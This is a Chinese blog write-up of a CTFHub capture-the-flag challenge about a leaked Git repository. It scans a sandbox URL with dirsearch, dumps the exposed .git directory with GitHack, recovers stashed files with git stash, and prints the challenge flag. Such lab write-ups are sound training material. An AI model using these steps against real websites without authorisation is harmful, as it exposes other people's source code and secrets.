CTFHubGit泄露—Stash解题思路笔记

Posted 曹振国cc

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了CTFHubGit泄露—Stash解题思路笔记相关的知识,希望对你有一定的参考价值。

一、开启环境

image-20210507201628190

1.使用dirsearch跑目录

python3 dirsearch.py -u http://challenge-b71d700a54eb5f7e.sandbox.ctfhub.com:10080/

发现Git泄露

image-20210507201842226

2.使用GitHack工具

python GitHack.py -u http://challenge-b71d700a54eb5f7e.sandbox.ctfhub.com:10080/.git

image-20210507202206531

3.打开文件查看被隐藏的文件列表

关于Git Stash 的用法可移步https://www.cnblogs.com/qianqiannian/p/6011513.html查看

git stash list	//查看被隐藏的文件列表

image-20210507202803700

4.发现有stash文件

git stash pop	//默认恢复git栈中最新的一个stash@{num},建议在git栈中只有一条的时候使用,以免混乱

发现flag

image-20210507203025650

二、FLAG

ctfhub{e3aa77e7e0afdf97ce85e5c8}

以上是关于CTFHubGit泄露—Stash解题思路笔记的主要内容,如果未能解决你的问题,请参考以下文章

CTFHub Git泄露-log解题思路

LeetCode笔记:Weekly Contest 269

LeetCode笔记:Biweekly Contest 68

LeetCode笔记:Biweekly Contest 68

LeetCode笔记:Weekly Contest 270

LeetCode笔记:Biweekly Contest 67